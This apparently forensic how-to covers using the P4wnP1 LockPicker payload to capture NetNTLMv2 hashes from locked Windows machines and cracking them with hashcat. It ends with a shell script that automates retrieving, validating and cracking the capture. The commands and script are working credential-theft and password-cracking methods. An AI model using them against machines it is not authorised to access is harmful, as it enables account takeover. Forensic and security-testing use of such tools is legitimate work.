• I am not a professional with this; this is a project I had heard about, seen a little bit of, and decided I wanted to make one. I don’t know how to use all the modules, and for the purpose of my job, the only one I was really interested in was the LockPicker payload.

  • The LockPicker payload ONLY captures NTLMv2 password hashes, meaning the NetNTLMv2 challenge/response that the lock screen sends to the P4WNP1 (the format hashcat mode 5600 takes), not the NT hash stored on the machine. A captured NetNTLMv2 response can only be cracked offline; it cannot be replayed or passed the way a raw NT hash can. At the time of this writing it worked on fully patched Windows 10 and Windows 11 machines.

    • PIN codes are not authenticated with NTLMv2, so the payload will not capture a hash from an account that only signs in with a PIN, nor can it brute-force the PIN.
  • If JTR (John the Ripper) does not crack the NTLMv2 hash automatically, you’re not done yet. Unplug your P4WNP1 from the suspect device, take it back to the office (or simply power the P4WNP1 by plugging it into a power source), and use a machine you control to access it via SSH.

    • Once logged in via SSH, navigate to the “collected” folder and run cat <FILENAME.hashes> to view the hash.

    • Copy the hash with the mouse and Ctrl+C; you may see the selection repeated on the line below, which doesn’t matter. Then, outside the SSH terminal, paste the hash into a Notepad file. Make sure it lands as one single line: a NetNTLMv2 hash is one long line of the form USER::DOMAIN:challenge:response:blob, and hashcat will reject it if the terminal wrapped it across several lines or if any of the colon-separated fields is missing.

      [Screenshot: a Notepad window (“Untitled”) holding the pasted hash; the hash in the screenshot was altered so the password could not be cracked from it.]

    • Save the file into your hashcat directory. I like to name mine something like ntlmv2.txt

    • Launch hashcat

    • The basic hashcat command to try to crack the NTLMv2 hash is

    hashcat -a 0 -m 5600 ntlmv2.txt rockyou.txt
    
    where -a 0 selects a straight (dictionary) attack and -m 5600 selects the NetNTLMv2 hash mode.
    This assumes your hash is saved in the hashcat directory as ntlmv2.txt AND
    you have the rockyou.txt wordlist also placed in the hashcat directory as rockyou.txt.
    Anything hashcat cracks is remembered in its potfile, so you can print the result again later with
    hashcat -m 5600 --show ntlmv2.txt
    
    • There are other options you can add to your hashcat command to use more or less of your GPU; the workload profile -w 1 through -w 4 is the usual knob, with higher numbers using more of the GPU.
    • There are also options to apply a rule set to a wordlist for on-the-fly modifications (-r <rulefile>, for example the best64.rule that ships in hashcat’s rules directory). Using this method, I cracked a 12-character alphanumeric “complex” password in 30 hours.
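As an added example (not part of the original notes, and not P4wnP1’s or hashcat’s own tooling), the following shell script automates the SSH, copy, save and crack steps above: it pulls the .hashes file off the P4WNP1 with scp, keeps only lines that have the NetNTLMv2 shape hashcat -m 5600 expects, drops exact duplicates (the "repeated selection" from the copy step), writes ntlmv2.txt and runs hashcat. The host name, SSH user and "collected" directory path are assumptions, and the sample hash line is constructed for the self-check, so it will never crack.

```shell
#!/bin/sh
# Added example, not from the original notes, P4wnP1 or hashcat.
# Pull a LockPicker capture off the P4wnP1 over SSH, keep only well-formed
# NetNTLMv2 challenge/response lines (what hashcat -m 5600 expects), drop exact
# duplicates, and run hashcat against the cleaned file.
#
# Assumptions (hypothetical, not from the page): the P4wnP1 answers SSH at
# P4WNP1_HOST as P4WNP1_USER, the capture lives under COLLECTED_DIR, and
# hashcat plus rockyou.txt are in the current directory.
P4WNP1_HOST="${P4WNP1_HOST:-p4wnp1.local}"
P4WNP1_USER="${P4WNP1_USER:-root}"
COLLECTED_DIR="${COLLECTED_DIR:-collected}"

# One NetNTLMv2 capture line, as hashcat -m 5600 expects it:
#   USER::DOMAIN:<16 hex server challenge>:<32 hex NTProofStr>:<hex blob>
# Returns 0 when the line has that shape, 1 otherwise.
is_netntlmv2_line() {
    printf '%s\n' "$1" |
        grep -Eq '^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$'
}

# Constructed sample line (NOT a real capture; it will never crack), used by the
# self-check. The blob starts with the usual 0101000000000000 NTLMv2 header,
# followed by made-up timestamp / client-challenge / AV-pair bytes.
SAMPLE_CAPTURE_LINE='jdoe::DESKTOP-EXAMPLE:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000a0b1c2d3e4f5061700112233445566770000000002000e0045005800410004000e00450058004100000000000000000000'

# clean_capture IN OUT: copy the well-formed lines of IN to OUT, one per line,
# with exact duplicates removed (e.g. a hash that was pasted twice), and print
# how many lines survived. Malformed lines are reported on stderr and skipped.
clean_capture() {
    in_file="$1"; out_file="$2"
    : > "$out_file"
    while IFS= read -r line || [ -n "$line" ]; do
        if is_netntlmv2_line "$line"; then
            printf '%s\n' "$line" >> "$out_file"
        elif [ -n "$line" ]; then
            printf 'skipping malformed line: %.40s...\n' "$line" >&2
        fi
    done < "$in_file"
    sort -u -o "$out_file" "$out_file"
    wc -l < "$out_file" | tr -d ' '
}

# crack_netntlmv2 HASHFILE WORDLIST [RULEFILE]: -a 0 is a straight dictionary
# attack, -m 5600 is the NetNTLMv2 mode, -r applies a rule file to the wordlist.
# Afterwards --show prints whatever hashcat already has in its potfile.
crack_netntlmv2() {
    hash_file="$1"; wordlist="$2"; rule_file="${3:-}"
    if ! command -v hashcat >/dev/null 2>&1; then
        echo "hashcat not in PATH; would run: hashcat -a 0 -m 5600 $hash_file $wordlist ${rule_file:+-r $rule_file}" >&2
        return 2
    fi
    hashcat -a 0 -m 5600 "$hash_file" "$wordlist" ${rule_file:+-r "$rule_file"}
    hashcat -m 5600 --show "$hash_file"
}

# fetch_and_crack FILENAME.hashes [RULEFILE]: the end-to-end run. It only
# executes when the script is started with --run, so sourcing the file merely
# defines the functions above.
fetch_and_crack() {
    scp "$P4WNP1_USER@$P4WNP1_HOST:$COLLECTED_DIR/$1" ./raw.hashes || return 1
    n=$(clean_capture ./raw.hashes ./ntlmv2.txt)
    echo "$n usable NetNTLMv2 line(s) written to ntlmv2.txt" >&2
    [ "$n" -gt 0 ] || return 1
    crack_netntlmv2 ./ntlmv2.txt ./rockyou.txt "${2:-}"
}

if [ "${1:-}" = "--run" ]; then
    fetch_and_crack "$2" "${3:-}"
fi
```

Run it as sh lockpicker_crack.sh --run FILENAME.hashes (optionally followed by a rule file such as rules/best64.rule). The format check is the part worth keeping even if you stay with the manual copy/paste: a line that fails it is the usual reason hashcat refuses a freshly pasted hash.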